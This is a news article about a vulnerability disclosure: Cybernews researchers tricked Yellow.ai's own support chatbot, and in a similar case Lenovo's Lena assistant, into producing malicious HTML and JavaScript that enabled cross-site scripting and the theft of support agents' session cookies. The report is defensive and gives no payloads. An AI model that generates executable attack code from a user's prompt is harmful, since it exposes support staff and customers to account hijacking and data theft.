Yellow.ai’s Own AI Chatbot Got Tricked Into Generating Malicious Code

The vulnerability could have enabled Cross-Site Scripting (XSS) attacks, endangering employee and customer data

3
Yellow.ai's Own AI Chatbot Got Tricked Into Generating Malicious Code
Conversational AILatest News

Published: September 17, 2025

Nicole Willing

Yellow.ai has become the latest firm flagged for a security flaw in its online chatbot, a vulnerability hackers could have used to hijack accounts.

While that may not seem headline-worthy, with the recent spate of conversational AI attacks, this has a twist… Yellow.AI is a chatbot provider.

Last month, it even featured as a Challenger in Gartner’s conversational AI Magic Quadrant.

Nevertheless, researchers at Cybernews found a flaw that allowed them to trick the company’s chatbot into generating HTML or JavaScript (JS) malicious code that could enable cross-site scripting (XSS) attacks. They reported:

The reflected XSS vulnerability allows the attacker to steal session cookies for the support agent’s account, in turn hijacking their account, which can lead to further data exfiltration from the customer support platform.

Indeed, the flaw left cookies created by Yellow.ai’s own customer service chatbot open to theft, although it’s unclear if clients using the bot in their CX implementations were exposed to the same vulnerability, the researchers said.

The likes of Sony, Hyundai, Domino’s, and Logitech use the Yellow.ai platform in their customer support operations.

While Yellow.ai did not acknowledge Cybernews’ disclosure of the security flaw, the company did fix it, sanitizing the generated code so that it would not be executed.

Cybernews’ researchers recently found a similar flaw in Lenovo’s customer service assistant, Lena, which was built on Microsoft Copilot Studio. It allowed them to hijack live session cookies from customer support agents to gain access to sensitive company information.

AI Chatbots Are Exposing Enterprises to Security Vulnerabilities

The incidents highlight the growing security risk to enterprises incorporating AI chatbots and agents into their customer service operations.

In recent days, the US Federal Bureau of Investigations (FBI) warned that cybercriminal groups have been targeting organizations’ Salesforce platforms by exploiting API software integrations with a third-party AI chatbot and conducting phishing attacks on CRM users, like customer support reps.

And the “sycophantic helpfulness” that Cybernews’ researchers note is ingrained in many of the large language models (LLMs) on which such AI tools run can make them vulnerable to misuse. Indeed, attackers can use simple prompts to get unprotected chatbots to inadvertently teach them how to produce malicious HTML and JavaScript code.

Executing JavaScript code, in particular, can have serious implications for security. Attackers can use JS to manipulate the behavior of web applications or even gain access to backend systems through further exploits.

The risk of account hijacking demonstrates why enterprises must be wary of the hype-driven push to implement LLM-based tools quickly without ensuring they have adequate security systems in place. According to Cybernews’ researchers:

The flaw highlights multiple security issues, such as improper user input sanitization, improper chatbot output sanitization, the web server not verifying content produced by the chatbot, running unverified code, and loading content from arbitrary web resources… For example, attackers could bypass sanitization to inject unauthorized code into the system.

AI chatbot scams are one of 2025’s most significant digital threats, according to cybersecurity firm Quick Heal Technologies. Security labs are detecting thousands of new AI-built fraud tools every month.

In addition to generating malicious code, criminals exploit pre-trained LLMs to deploy automated fraudulent attacks that can target thousands of victims simultaneously. As AI becomes more sophisticated, hackers are imitating trusted brands such as banks, delivery services, and government agencies with increasing accuracy.

 

Artificial IntelligenceChatbotsVirtual Agent

Brands mentioned in this article.

Featured

Share This Post